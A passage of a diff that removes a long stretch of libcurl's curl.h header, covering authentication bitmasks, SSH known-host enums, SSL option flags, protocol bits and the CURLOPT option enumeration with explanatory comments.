- * CURLAUTH_NEGOTIATE    - HTTP Negotiate (SPNEGO) authentication
- * CURLAUTH_GSSNEGOTIATE - Alias for CURLAUTH_NEGOTIATE (deprecated)
- * CURLAUTH_NTLM         - HTTP NTLM authentication
- * CURLAUTH_DIGEST_IE    - HTTP Digest authentication with IE flavour
- * CURLAUTH_NTLM_WB      - HTTP NTLM authentication delegated to winbind helper
- * CURLAUTH_ONLY         - Use together with a single other type to force no
- *                         authentication or just that single type
- * CURLAUTH_ANY          - All fine types set
- * CURLAUTH_ANYSAFE      - All fine types except Basic
- */
-
-#define CURLAUTH_NONE         ((unsigned long)0)
-#define CURLAUTH_BASIC        (((unsigned long)1)<<0)
-#define CURLAUTH_DIGEST       (((unsigned long)1)<<1)
-#define CURLAUTH_NEGOTIATE    (((unsigned long)1)<<2)
-/* Deprecated since the advent of CURLAUTH_NEGOTIATE */
-#define CURLAUTH_GSSNEGOTIATE CURLAUTH_NEGOTIATE
-/* Used for CURLOPT_SOCKS5_AUTH to stay terminologically correct */
-#define CURLAUTH_GSSAPI CURLAUTH_NEGOTIATE
-#define CURLAUTH_NTLM         (((unsigned long)1)<<3)
-#define CURLAUTH_DIGEST_IE    (((unsigned long)1)<<4)
-#define CURLAUTH_NTLM_WB      (((unsigned long)1)<<5)
-#define CURLAUTH_ONLY         (((unsigned long)1)<<31)
-#define CURLAUTH_ANY          (~CURLAUTH_DIGEST_IE)
-#define CURLAUTH_ANYSAFE      (~(CURLAUTH_BASIC|CURLAUTH_DIGEST_IE))
-
-#define CURLSSH_AUTH_ANY       ~0     /* all types supported by the server */
-#define CURLSSH_AUTH_NONE      0      /* none allowed, silly but complete */
-#define CURLSSH_AUTH_PUBLICKEY (1<<0) /* public/private key files */
-#define CURLSSH_AUTH_PASSWORD  (1<<1) /* password */
-#define CURLSSH_AUTH_HOST      (1<<2) /* host key files */
-#define CURLSSH_AUTH_KEYBOARD  (1<<3) /* keyboard interactive */
-#define CURLSSH_AUTH_AGENT     (1<<4) /* agent (ssh-agent, pageant...) */
-#define CURLSSH_AUTH_GSSAPI    (1<<5) /* gssapi (kerberos, ...) */
-#define CURLSSH_AUTH_DEFAULT CURLSSH_AUTH_ANY
-
-#define CURLGSSAPI_DELEGATION_NONE        0      /* no delegation (default) */
-#define CURLGSSAPI_DELEGATION_POLICY_FLAG (1<<0) /* if permitted by policy */
-#define CURLGSSAPI_DELEGATION_FLAG        (1<<1) /* delegate always */
-
-#define CURL_ERROR_SIZE 256
-
-enum curl_khtype {
-  CURLKHTYPE_UNKNOWN,
-  CURLKHTYPE_RSA1,
-  CURLKHTYPE_RSA,
-  CURLKHTYPE_DSS,
-  CURLKHTYPE_ECDSA,
-  CURLKHTYPE_ED25519
-};
-
-struct curl_khkey {
-  const char *key; /* points to a zero-terminated string encoded with base64
-                      if len is zero, otherwise to the "raw" data */
-  size_t len;
-  enum curl_khtype keytype;
-};
-
-/* this is the set of return values expected from the curl_sshkeycallback
-   callback */
-enum curl_khstat {
-  CURLKHSTAT_FINE_ADD_TO_FILE,
-  CURLKHSTAT_FINE,
-  CURLKHSTAT_REJECT, /* reject the connection, return an error */
-  CURLKHSTAT_DEFER,  /* do not accept it, but we can't answer right now so
-                        this causes a CURLE_DEFER error but otherwise the
-                        connection will be left intact etc */
-  CURLKHSTAT_LAST    /* not for use, only a marker for last-in-list */
-};
-
-/* this is the set of status codes pass in to the callback */
-enum curl_khmatch {
-  CURLKHMATCH_OK,       /* match */
-  CURLKHMATCH_MISMATCH, /* host found, key mismatch! */
-  CURLKHMATCH_MISSING,  /* no matching host/key found */
-  CURLKHMATCH_LAST      /* not for use, only a marker for last-in-list */
-};
-
-typedef int
-  (*curl_sshkeycallback) (CURL *easy,     /* easy handle */
-                          const struct curl_khkey *knownkey, /* known */
-                          const struct curl_khkey *foundkey, /* found */
-                          enum curl_khmatch, /* libcurl's view on the keys */
-                          void *clientp); /* custom pointer passed from app */
-
-/* parameter for the CURLOPT_USE_SSL option */
-typedef enum {
-  CURLUSESSL_NONE,    /* do not attempt to use SSL */
-  CURLUSESSL_TRY,     /* try using SSL, proceed anyway otherwise */
-  CURLUSESSL_CONTROL, /* SSL for the control connection or fail */
-  CURLUSESSL_ALL,     /* SSL for all communication or fail */
-  CURLUSESSL_LAST     /* not an option, never use */
-} curl_usessl;
-
-/* Definition of bits for the CURLOPT_SSL_OPTIONS argument: */
-
-/* - ALLOW_BEAST tells libcurl to allow the BEAST SSL vulnerability in the
-   name of improving interoperability with older servers. Some SSL libraries
-   have introduced work-arounds for this flaw but those work-arounds sometimes
-   make the SSL communication fail. To regain functionality with those broken
-   servers, a user can this way allow the vulnerability back. */
-#define CURLSSLOPT_ALLOW_BEAST (1<<0)
-
-/* - NO_REVOKE tells libcurl to disable certificate revocation checks for those
-   SSL backends where such behavior is present. */
-#define CURLSSLOPT_NO_REVOKE (1<<1)
-
-/* The default connection attempt delay in milliseconds for happy eyeballs.
-   CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS.3 and happy-eyeballs-timeout-ms.d document
-   this value, keep them in sync. */
-#define CURL_HET_DEFAULT 200L
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Backwards compatibility with older names */
-/* These are scheduled to disappear by 2009 */
-
-#define CURLFTPSSL_NONE CURLUSESSL_NONE
-#define CURLFTPSSL_TRY CURLUSESSL_TRY
-#define CURLFTPSSL_CONTROL CURLUSESSL_CONTROL
-#define CURLFTPSSL_ALL CURLUSESSL_ALL
-#define CURLFTPSSL_LAST CURLUSESSL_LAST
-#define curl_ftpssl curl_usessl
-#endif /*!CURL_NO_OLDIES*/
-
-/* parameter for the CURLOPT_FTP_SSL_CCC option */
-typedef enum {
-  CURLFTPSSL_CCC_NONE,    /* do not send CCC */
-  CURLFTPSSL_CCC_PASSIVE, /* Let the server initiate the shutdown */
-  CURLFTPSSL_CCC_ACTIVE,  /* Initiate the shutdown */
-  CURLFTPSSL_CCC_LAST     /* not an option, never use */
-} curl_ftpccc;
-
-/* parameter for the CURLOPT_FTPSSLAUTH option */
-typedef enum {
-  CURLFTPAUTH_DEFAULT, /* let libcurl decide */
-  CURLFTPAUTH_SSL,     /* use "AUTH SSL" */
-  CURLFTPAUTH_TLS,     /* use "AUTH TLS" */
-  CURLFTPAUTH_LAST /* not an option, never use */
-} curl_ftpauth;
-
-/* parameter for the CURLOPT_FTP_CREATE_MISSING_DIRS option */
-typedef enum {
-  CURLFTP_CREATE_DIR_NONE,  /* do NOT create missing dirs! */
-  CURLFTP_CREATE_DIR,       /* (FTP/SFTP) if CWD fails, try MKD and then CWD
-                               again if MKD succeeded, for SFTP this does
-                               similar magic */
-  CURLFTP_CREATE_DIR_RETRY, /* (FTP only) if CWD fails, try MKD and then CWD
-                               again even if MKD failed! */
-  CURLFTP_CREATE_DIR_LAST   /* not an option, never use */
-} curl_ftpcreatedir;
-
-/* parameter for the CURLOPT_FTP_FILEMETHOD option */
-typedef enum {
-  CURLFTPMETHOD_DEFAULT,   /* let libcurl pick */
-  CURLFTPMETHOD_MULTICWD,  /* single CWD operation for each path part */
-  CURLFTPMETHOD_NOCWD,     /* no CWD at all */
-  CURLFTPMETHOD_SINGLECWD, /* one CWD to full dir, then work on file */
-  CURLFTPMETHOD_LAST       /* not an option, never use */
-} curl_ftpmethod;
-
-/* bitmask defines for CURLOPT_HEADEROPT */
-#define CURLHEADER_UNIFIED  0
-#define CURLHEADER_SEPARATE (1<<0)
-
-/* CURLPROTO_ defines are for the CURLOPT_*PROTOCOLS options */
-#define CURLPROTO_HTTP   (1<<0)
-#define CURLPROTO_HTTPS  (1<<1)
-#define CURLPROTO_FTP    (1<<2)
-#define CURLPROTO_FTPS   (1<<3)
-#define CURLPROTO_SCP    (1<<4)
-#define CURLPROTO_SFTP   (1<<5)
-#define CURLPROTO_TELNET (1<<6)
-#define CURLPROTO_LDAP   (1<<7)
-#define CURLPROTO_LDAPS  (1<<8)
-#define CURLPROTO_DICT   (1<<9)
-#define CURLPROTO_FILE   (1<<10)
-#define CURLPROTO_TFTP   (1<<11)
-#define CURLPROTO_IMAP   (1<<12)
-#define CURLPROTO_IMAPS  (1<<13)
-#define CURLPROTO_POP3   (1<<14)
-#define CURLPROTO_POP3S  (1<<15)
-#define CURLPROTO_SMTP   (1<<16)
-#define CURLPROTO_SMTPS  (1<<17)
-#define CURLPROTO_RTSP   (1<<18)
-#define CURLPROTO_RTMP   (1<<19)
-#define CURLPROTO_RTMPT  (1<<20)
-#define CURLPROTO_RTMPE  (1<<21)
-#define CURLPROTO_RTMPTE (1<<22)
-#define CURLPROTO_RTMPS  (1<<23)
-#define CURLPROTO_RTMPTS (1<<24)
-#define CURLPROTO_GOPHER (1<<25)
-#define CURLPROTO_SMB    (1<<26)
-#define CURLPROTO_SMBS   (1<<27)
-#define CURLPROTO_ALL    (~0) /* enable everything */
-
-/* long may be 32 or 64 bits, but we should never depend on anything else
-   but 32 */
-#define CURLOPTTYPE_LONG          0
-#define CURLOPTTYPE_OBJECTPOINT   10000
-#define CURLOPTTYPE_STRINGPOINT   10000
-#define CURLOPTTYPE_FUNCTIONPOINT 20000
-#define CURLOPTTYPE_OFF_T         30000
-
-/* *STRINGPOINT is an alias for OBJECTPOINT to allow tools to extract the
-   string options from the header file */
-
-/* name is uppercase CURLOPT_<name>,
-   type is one of the defined CURLOPTTYPE_<type>
-   number is unique identifier */
-#ifdef CINIT
-#undef CINIT
-#endif
-
-#ifdef CURL_ISOCPP
-#define CINIT(na,t,nu) CURLOPT_ ## na = CURLOPTTYPE_ ## t + nu
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define LONG          CURLOPTTYPE_LONG
-#define OBJECTPOINT   CURLOPTTYPE_OBJECTPOINT
-#define STRINGPOINT   CURLOPTTYPE_OBJECTPOINT
-#define FUNCTIONPOINT CURLOPTTYPE_FUNCTIONPOINT
-#define OFF_T         CURLOPTTYPE_OFF_T
-#define CINIT(name,type,number) CURLOPT_/**/name = type + number
-#endif
-
-/*
- * This macro-mania below setups the CURLOPT_[what] enum, to be used with
- * curl_easy_setopt(). The first argument in the CINIT() macro is the [what]
- * word.
- */
-
-typedef enum {
-  /* This is the FILE * or void * the regular output should be written to. */
-  CINIT(WRITEDATA, OBJECTPOINT, 1),
-
-  /* The full URL to get/put */
-  CINIT(URL, STRINGPOINT, 2),
-
-  /* Port number to connect to, if other than default. */
-  CINIT(PORT, LONG, 3),
-
-  /* Name of proxy to use. */
-  CINIT(PROXY, STRINGPOINT, 4),
-
-  /* "user:password;options" to use when fetching. */
-  CINIT(USERPWD, STRINGPOINT, 5),
-
-  /* "user:password" to use with proxy. */
-  CINIT(PROXYUSERPWD, STRINGPOINT, 6),
-
-  /* Range to get, specified as an ASCII string. */
-  CINIT(RANGE, STRINGPOINT, 7),
-
-  /* not used */
-
-  /* Specified file stream to upload from (use as input): */
-  CINIT(READDATA, OBJECTPOINT, 9),
-
-  /* Buffer to receive error messages in, must be at least CURL_ERROR_SIZE
-   * bytes big. */
-  CINIT(ERRORBUFFER, OBJECTPOINT, 10),
-
-  /* Function that will be called to store the output (instead of fwrite). The
-   * parameters will use fwrite() syntax, make sure to follow them. */
-  CINIT(WRITEFUNCTION, FUNCTIONPOINT, 11),
-
-  /* Function that will be called to read the input (instead of fread). The
-   * parameters will use fread() syntax, make sure to follow them. */
-  CINIT(READFUNCTION, FUNCTIONPOINT, 12),
-
-  /* Time-out the read operation after this amount of seconds */
-  CINIT(TIMEOUT, LONG, 13),
-
-  /* If the CURLOPT_INFILE is used, this can be used to inform libcurl about
-   * how large the file being sent really is. That allows better error
-   * checking and better verifies that the upload was successful. -1 means
-   * unknown size.
-   *
-   * For large file support, there is also a _LARGE version of the key
-   * which takes an off_t type, allowing platforms with larger off_t
-   * sizes to handle larger files.  See below for INFILESIZE_LARGE.
-   */
-  CINIT(INFILESIZE, LONG, 14),
-
-  /* POST static input fields. */
-  CINIT(POSTFIELDS, OBJECTPOINT, 15),
-
-  /* Set the referrer page (needed by some CGIs) */
-  CINIT(REFERER, STRINGPOINT, 16),
-
-  /* Set the FTP PORT string (interface name, named or numerical IP address)
-     Use i.e '-' to use default address. */
-  CINIT(FTPPORT, STRINGPOINT, 17),
-
-  /* Set the User-Agent string (examined by some CGIs) */
-  CINIT(USERAGENT, STRINGPOINT, 18),
-
-  /* If the download receives less than "low speed limit" bytes/second
-   * during "low speed time" seconds, the operations is aborted.
-   * You could i.e if you have a pretty high speed connection, abort if
-   * it is less than 2000 bytes/sec during 20 seconds.
-   */
-
-  /* Set the "low speed limit" */
-  CINIT(LOW_SPEED_LIMIT, LONG, 19),
-
-  /* Set the "low speed time" */
-  CINIT(LOW_SPEED_TIME, LONG, 20),
-
-  /* Set the continuation offset.
-   *
-   * Note there is also a _LARGE version of this key which uses
-   * off_t types, allowing for large file offsets on platforms which
-   * use larger-than-32-bit off_t's.  Look below for RESUME_FROM_LARGE.
-   */
-  CINIT(RESUME_FROM, LONG, 21),
-
-  /* Set cookie in request: */
-  CINIT(COOKIE, STRINGPOINT, 22),
-
-  /* This points to a linked list of headers, struct curl_slist kind. This
-     list is also used for RTSP (in spite of its name) */
-  CINIT(HTTPHEADER, OBJECTPOINT, 23),
-
-  /* This points to a linked list of post entries, struct curl_httppost */
-  CINIT(HTTPPOST, OBJECTPOINT, 24),
-
-  /* name of the file keeping your private SSL-certificate */
-  CINIT(SSLCERT, STRINGPOINT, 25),
-
-  /* password for the SSL or SSH private key */
-  CINIT(KEYPASSWD, STRINGPOINT, 26),
-
-  /* send TYPE parameter? */
-  CINIT(CRLF, LONG, 27),
-
-  /* send linked-list of QUOTE commands */
-  CINIT(QUOTE, OBJECTPOINT, 28),
-
-  /* send FILE * or void * to store headers to, if you use a callback it
-     is simply passed to the callback unmodified */
-  CINIT(HEADERDATA, OBJECTPOINT, 29),
-
-  /* point to a file to read the initial cookies from, also enables
-     "cookie awareness" */
-  CINIT(COOKIEFILE, STRINGPOINT, 31),
-
-  /* What version to specifically try to use.
-     See CURL_SSLVERSION defines below. */
-  CINIT(SSLVERSION, LONG, 32),
-
-  /* What kind of HTTP time condition to use, see defines */
-  CINIT(TIMECONDITION, LONG, 33),
-
-  /* Time to use with the above condition. Specified in number of seconds
-     since 1 Jan 1970 */
-  CINIT(TIMEVALUE, LONG, 34),
-
-  /* 35 = OBSOLETE */
-
-  /* Custom request, for customizing the get command like
-     HTTP: DELETE, TRACE and others
-     FTP: to use a different list command
-     */
-  CINIT(CUSTOMREQUEST, STRINGPOINT, 36),
-
-  /* FILE handle to use instead of stderr */
-  CINIT(STDERR, OBJECTPOINT, 37),
-
-  /* 38 is not used */
-
-  /* send linked-list of post-transfer QUOTE commands */
-  CINIT(POSTQUOTE, OBJECTPOINT, 39),
-
-  CINIT(OBSOLETE40, OBJECTPOINT, 40), /* OBSOLETE, do not use! */
-
-  CINIT(VERBOSE, LONG, 41),      /* talk a lot */
-  CINIT(HEADER, LONG, 42),       /* throw the header out too */
-  CINIT(NOPROGRESS, LONG, 43),   /* shut off the progress meter */
-  CINIT(NOBODY, LONG, 44),       /* use HEAD to get http document */
-  CINIT(FAILONERROR, LONG, 45),  /* no output on http error codes >= 400 */
-  CINIT(UPLOAD, LONG, 46),       /* this is an upload */
-  CINIT(POST, LONG, 47),         /* HTTP POST method */
-  CINIT(DIRLISTONLY, LONG, 48),  /* bare names when listing directories */
-
-  CINIT(APPEND, LONG, 50),       /* Append instead of overwrite on upload! */
-
-  /* Specify whether to read the user+password from the .netrc or the URL.
-   * This must be one of the CURL_NETRC_* enums below. */
-  CINIT(NETRC, LONG, 51),
-
-  CINIT(FOLLOWLOCATION, LONG, 52),  /* use Location: Luke! */
-
-  CINIT(TRANSFERTEXT, LONG, 53), /* transfer data in text/ASCII format */
-  CINIT(PUT, LONG, 54),          /* HTTP PUT */
-
-  /* 55 = OBSOLETE */
-
-  /* DEPRECATED
-   * Function that will be called instead of the internal progress display
-   * function. This function should be defined as the curl_progress_callback
-   * prototype defines. */
-  CINIT(PROGRESSFUNCTION, FUNCTIONPOINT, 56),
-
-  /* Data passed to the CURLOPT_PROGRESSFUNCTION and CURLOPT_XFERINFOFUNCTION
-     callbacks */
-  CINIT(PROGRESSDATA, OBJECTPOINT, 57),
-#define CURLOPT_XFERINFODATA CURLOPT_PROGRESSDATA
-
-  /* We want the referrer field set automatically when following locations */
-  CINIT(AUTOREFERER, LONG, 58),
-
-  /* Port of the proxy, can be set in the proxy string as well with:
-     "[host]:[port]" */
-  CINIT(PROXYPORT, LONG, 59),
-
-  /* size of the POST input data, if strlen() is not good to use */
-  CINIT(POSTFIELDSIZE, LONG, 60),
-
-  /* tunnel non-http operations through a HTTP proxy */
-  CINIT(HTTPPROXYTUNNEL, LONG, 61),
-
-  /* Set the interface string to use as outgoing network interface */
-  CINIT(INTERFACE, STRINGPOINT, 62),
-
-  /* Set the krb4/5 security level, this also enables krb4/5 awareness.  This
-   * is a string, 'clear', 'safe', 'confidential' or 'private'.  If the string
-   * is set but doesn't match one of these, 'private' will be used.  */
-  CINIT(KRBLEVEL, STRINGPOINT, 63),
-
-  /* Set if we should verify the peer in ssl handshake, set 1 to verify. */
-  CINIT(SSL_VERIFYPEER, LONG, 64),
-
-  /* The CApath or CAfile used to validate the peer certificate
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(CAINFO, STRINGPOINT, 65),
-
-  /* 66 = OBSOLETE */
-  /* 67 = OBSOLETE */
-
-  /* Maximum number of http redirects to follow */
-  CINIT(MAXREDIRS, LONG, 68),
-
-  /* Pass a long set to 1 to get the date of the requested document (if
-     possible)! Pass a zero to shut it off. */
-  CINIT(FILETIME, LONG, 69),
-
-  /* This points to a linked list of telnet options */
-  CINIT(TELNETOPTIONS, OBJECTPOINT, 70),
-
-  /* Max amount of cached alive connections */
-  CINIT(MAXCONNECTS, LONG, 71),
-
-  CINIT(OBSOLETE72, LONG, 72), /* OBSOLETE, do not use! */
-
-  /* 73 = OBSOLETE */
-
-  /* Set to explicitly use a new connection for the upcoming transfer.
-     Do not use this unless you're absolutely sure of this, as it makes the
-     operation slower and is less friendly for the network. */
-  CINIT(FRESH_CONNECT, LONG, 74),
-
-  /* Set to explicitly forbid the upcoming transfer's connection to be re-used
-     when done. Do not use this unless you're absolutely sure of this, as it
-     makes the operation slower and is less friendly for the network. */
-  CINIT(FORBID_REUSE, LONG, 75),
-
-  /* Set to a file name that contains random data for libcurl to use to
-     seed the random engine when doing SSL connects. */
-  CINIT(RANDOM_FILE, STRINGPOINT, 76),
-
-  /* Set to the Entropy Gathering Daemon socket pathname */
-  CINIT(EGDSOCKET, STRINGPOINT, 77),
-
-  /* Time-out connect operations after this amount of seconds, if connects are
-     OK within this time, then fine... This only aborts the connect phase. */
-  CINIT(CONNECTTIMEOUT, LONG, 78),
-
-  /* Function that will be called to store headers (instead of fwrite). The
-   * parameters will use fwrite() syntax, make sure to follow them. */
-  CINIT(HEADERFUNCTION, FUNCTIONPOINT, 79),
-
-  /* Set this to force the HTTP request to get back to GET. Only really usable
-     if POST, PUT or a custom request have been used first.
-   */
-  CINIT(HTTPGET, LONG, 80),
-
-  /* Set if we should verify the Common name from the peer certificate in ssl
-   * handshake, set 1 to check existence, 2 to ensure that it matches the
-   * provided hostname. */
-  CINIT(SSL_VERIFYHOST, LONG, 81),
-
-  /* Specify which file name to write all known cookies in after completed
-     operation. Set file name to "-" (dash) to make it go to stdout. */
-  CINIT(COOKIEJAR, STRINGPOINT, 82),
-
-  /* Specify which SSL ciphers to use */
-  CINIT(SSL_CIPHER_LIST, STRINGPOINT, 83),
-
-  /* Specify which HTTP version to use! This must be set to one of the
-     CURL_HTTP_VERSION* enums set below. */
-  CINIT(HTTP_VERSION, LONG, 84),
-
-  /* Specifically switch on or off the FTP engine's use of the EPSV command. By
-     default, that one will always be attempted before the more traditional
-     PASV command. */
-  CINIT(FTP_USE_EPSV, LONG, 85),
-
-  /* type of the file keeping your SSL-certificate ("DER", "PEM", "ENG") */
-  CINIT(SSLCERTTYPE, STRINGPOINT, 86),
-
-  /* name of the file keeping your private SSL-key */
-  CINIT(SSLKEY, STRINGPOINT, 87),
-
-  /* type of the file keeping your private SSL-key ("DER", "PEM", "ENG") */
-  CINIT(SSLKEYTYPE, STRINGPOINT, 88),
-
-  /* crypto engine for the SSL-sub system */
-  CINIT(SSLENGINE, STRINGPOINT, 89),
-
-  /* set the crypto engine for the SSL-sub system as default
-     the param has no meaning...
-   */
-  CINIT(SSLENGINE_DEFAULT, LONG, 90),
-
-  /* Non-zero value means to use the global dns cache */
-  CINIT(DNS_USE_GLOBAL_CACHE, LONG, 91), /* DEPRECATED, do not use! */
-
-  /* DNS cache timeout */
-  CINIT(DNS_CACHE_TIMEOUT, LONG, 92),
-
-  /* send linked-list of pre-transfer QUOTE commands */
-  CINIT(PREQUOTE, OBJECTPOINT, 93),
-
-  /* set the debug function */
-  CINIT(DEBUGFUNCTION, FUNCTIONPOINT, 94),
-
-  /* set the data for the debug function */
-  CINIT(DEBUGDATA, OBJECTPOINT, 95),
-
-  /* mark this as start of a cookie session */
-  CINIT(COOKIESESSION, LONG, 96),
-
-  /* The CApath directory used to validate the peer certificate
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(CAPATH, STRINGPOINT, 97),
-
-  /* Instruct libcurl to use a smaller receive buffer */
-  CINIT(BUFFERSIZE, LONG, 98),
-
-  /* Instruct libcurl to not use any signal/alarm handlers, even when using
-     timeouts. This option is useful for multi-threaded applications.
-     See libcurl-the-guide for more background information. */
-  CINIT(NOSIGNAL, LONG, 99),
-
-  /* Provide a CURLShare for mutexing non-ts data */
-  CINIT(SHARE, OBJECTPOINT, 100),
-
-  /* indicates type of proxy. accepted values are CURLPROXY_HTTP (default),
-     CURLPROXY_HTTPS, CURLPROXY_SOCKS4, CURLPROXY_SOCKS4A and
-     CURLPROXY_SOCKS5. */
-  CINIT(PROXYTYPE, LONG, 101),
-
-  /* Set the Accept-Encoding string. Use this to tell a server you would like
-     the response to be compressed. Before 7.21.6, this was known as
-     CURLOPT_ENCODING */
-  CINIT(ACCEPT_ENCODING, STRINGPOINT, 102),
-
-  /* Set pointer to private data */
-  CINIT(PRIVATE, OBJECTPOINT, 103),
-
-  /* Set aliases for HTTP 200 in the HTTP Response header */
-  CINIT(HTTP200ALIASES, OBJECTPOINT, 104),
-
-  /* Continue to send authentication (user+password) when following locations,
-     even when hostname changed. This can potentially send off the name
-     and password to whatever host the server decides. */
-  CINIT(UNRESTRICTED_AUTH, LONG, 105),
-
-  /* Specifically switch on or off the FTP engine's use of the EPRT command (
-     it also disables the LPRT attempt). By default, those ones will always be
-     attempted before the good old traditional PORT command. */
-  CINIT(FTP_USE_EPRT, LONG, 106),
-
-  /* Set this to a bitmask value to enable the particular authentications
-     methods you like. Use this in combination with CURLOPT_USERPWD.
-     Note that setting multiple bits may cause extra network round-trips. */
-  CINIT(HTTPAUTH, LONG, 107),
-
-  /* Set the ssl context callback function, currently only for OpenSSL ssl_ctx
-     in second argument. The function must be matching the
-     curl_ssl_ctx_callback proto. */
-  CINIT(SSL_CTX_FUNCTION, FUNCTIONPOINT, 108),
-
-  /* Set the userdata for the ssl context callback function's third
-     argument */
-  CINIT(SSL_CTX_DATA, OBJECTPOINT, 109),
-
-  /* FTP Option that causes missing dirs to be created on the remote server.
-     In 7.19.4 we introduced the convenience enums for this option using the
-     CURLFTP_CREATE_DIR prefix.
-  */
-  CINIT(FTP_CREATE_MISSING_DIRS, LONG, 110),
-
-  /* Set this to a bitmask value to enable the particular authentications
-     methods you like. Use this in combination with CURLOPT_PROXYUSERPWD.
-     Note that setting multiple bits may cause extra network round-trips. */
-  CINIT(PROXYAUTH, LONG, 111),
-
-  /* FTP option that changes the timeout, in seconds, associated with
-     getting a response.  This is different from transfer timeout time and
-     essentially places a demand on the FTP server to acknowledge commands
-     in a timely manner. */
-  CINIT(FTP_RESPONSE_TIMEOUT, LONG, 112),
-#define CURLOPT_SERVER_RESPONSE_TIMEOUT CURLOPT_FTP_RESPONSE_TIMEOUT
-
-  /* Set this option to one of the CURL_IPRESOLVE_* defines (see below) to
-     tell libcurl to resolve names to those IP versions only. This only has
-     affect on systems with support for more than one, i.e IPv4 _and_ IPv6. */
-  CINIT(IPRESOLVE, LONG, 113),
-
-  /* Set this option to limit the size of a file that will be downloaded from
-     an HTTP or FTP server.
-
-     Note there is also _LARGE version which adds large file support for
-     platforms which have larger off_t sizes.  See MAXFILESIZE_LARGE below. */
-  CINIT(MAXFILESIZE, LONG, 114),
-
-  /* See the comment for INFILESIZE above, but in short, specifies
-   * the size of the file being uploaded.  -1 means unknown.
-   */
-  CINIT(INFILESIZE_LARGE, OFF_T, 115),
-
-  /* Sets the continuation offset.  There is also a LONG version of this;
-   * look above for RESUME_FROM.
-   */
-  CINIT(RESUME_FROM_LARGE, OFF_T, 116),
-
-  /* Sets the maximum size of data that will be downloaded from
-   * an HTTP or FTP server.  See MAXFILESIZE above for the LONG version.
-   */
-  CINIT(MAXFILESIZE_LARGE, OFF_T, 117),
-
-  /* Set this option to the file name of your .netrc file you want libcurl
-     to parse (using the CURLOPT_NETRC option). If not set, libcurl will do
-     a poor attempt to find the user's home directory and check for a .netrc
-     file in there. */
-  CINIT(NETRC_FILE, STRINGPOINT, 118),
-
-  /* Enable SSL/TLS for FTP, pick one of:
-     CURLUSESSL_TRY     - try using SSL, proceed anyway otherwise
-     CURLUSESSL_CONTROL - SSL for the control connection or fail
-     CURLUSESSL_ALL     - SSL for all communication or fail
-  */
-  CINIT(USE_SSL, LONG, 119),
-
-  /* The _LARGE version of the standard POSTFIELDSIZE option */
-  CINIT(POSTFIELDSIZE_LARGE, OFF_T, 120),
-
-  /* Enable/disable the TCP Nagle algorithm */
-  CINIT(TCP_NODELAY, LONG, 121),
-
-  /* 122 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 123 OBSOLETE. Gone in 7.16.0 */
-  /* 124 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 125 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 126 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 127 OBSOLETE. Gone in 7.16.0 */
-  /* 128 OBSOLETE. Gone in 7.16.0 */
-
-  /* When FTP over SSL/TLS is selected (with CURLOPT_USE_SSL), this option
-     can be used to change libcurl's default action which is to first try
-     "AUTH SSL" and then "AUTH TLS" in this order, and proceed when a OK
-     response has been received.
-
-     Available parameters are:
-     CURLFTPAUTH_DEFAULT - let libcurl decide
-     CURLFTPAUTH_SSL     - try "AUTH SSL" first, then TLS
-     CURLFTPAUTH_TLS     - try "AUTH TLS" first, then SSL
-  */
-  CINIT(FTPSSLAUTH, LONG, 129),
-
-  CINIT(IOCTLFUNCTION, FUNCTIONPOINT, 130),
-  CINIT(IOCTLDATA, OBJECTPOINT, 131),
-
-  /* 132 OBSOLETE. Gone in 7.16.0 */
-  /* 133 OBSOLETE. Gone in 7.16.0 */
-
-  /* zero terminated string for pass on to the FTP server when asked for
-     "account" info */
-  CINIT(FTP_ACCOUNT, STRINGPOINT, 134),
-
-  /* feed cookie into cookie engine */
-  CINIT(COOKIELIST, STRINGPOINT, 135),
-
-  /* ignore Content-Length */
-  CINIT(IGNORE_CONTENT_LENGTH, LONG, 136),
-
-  /* Set to non-zero to skip the IP address received in a 227 PASV FTP server
-     response. Typically used for FTP-SSL purposes but is not restricted to
-     that. libcurl will then instead use the same IP address it used for the
-     control connection. */
-  CINIT(FTP_SKIP_PASV_IP, LONG, 137),
-
-  /* Select "file method" to use when doing FTP, see the curl_ftpmethod
-     above. */
-  CINIT(FTP_FILEMETHOD, LONG, 138),
-
-  /* Local port number to bind the socket to */
-  CINIT(LOCALPORT, LONG, 139),
-
-  /* Number of ports to try, including the first one set with LOCALPORT.
-     Thus, setting it to 1 will make no additional attempts but the first.
-  */
-  CINIT(LOCALPORTRANGE, LONG, 140),
-
-  /* no transfer, set up connection and let application use the socket by
-     extracting it with CURLINFO_LASTSOCKET */
-  CINIT(CONNECT_ONLY, LONG, 141),
-
-  /* Function that will be called to convert from the
-     network encoding (instead of using the iconv calls in libcurl) */
-  CINIT(CONV_FROM_NETWORK_FUNCTION, FUNCTIONPOINT, 142),
-
-  /* Function that will be called to convert to the
-     network encoding (instead of using the iconv calls in libcurl) */
-  CINIT(CONV_TO_NETWORK_FUNCTION, FUNCTIONPOINT, 143),
-
-  /* Function that will be called to convert from UTF8
-     (instead of using the iconv calls in libcurl)
-     Note that this is used only for SSL certificate processing */
-  CINIT(CONV_FROM_UTF8_FUNCTION, FUNCTIONPOINT, 144),
-
-  /* if the connection proceeds too quickly then need to slow it down */
-  /* limit-rate: maximum number of bytes per second to send or receive */
-  CINIT(MAX_SEND_SPEED_LARGE, OFF_T, 145),
-  CINIT(MAX_RECV_SPEED_LARGE, OFF_T, 146),
-
-  /* Pointer to command string to send if USER/PASS fails. */
-  CINIT(FTP_ALTERNATIVE_TO_USER, STRINGPOINT, 147),
-
-  /* callback function for setting socket options */
-  CINIT(SOCKOPTFUNCTION, FUNCTIONPOINT, 148),
-  CINIT(SOCKOPTDATA, OBJECTPOINT, 149),
-
-  /* set to 0 to disable session ID re-use for this transfer, default is
-     enabled (== 1) */
-  CINIT(SSL_SESSIONID_CACHE, LONG, 150),
-
-  /* allowed SSH authentication methods */
-  CINIT(SSH_AUTH_TYPES, LONG, 151),
-
-  /* Used by scp/sftp to do public/private key authentication */
-  CINIT(SSH_PUBLIC_KEYFILE, STRINGPOINT, 152),
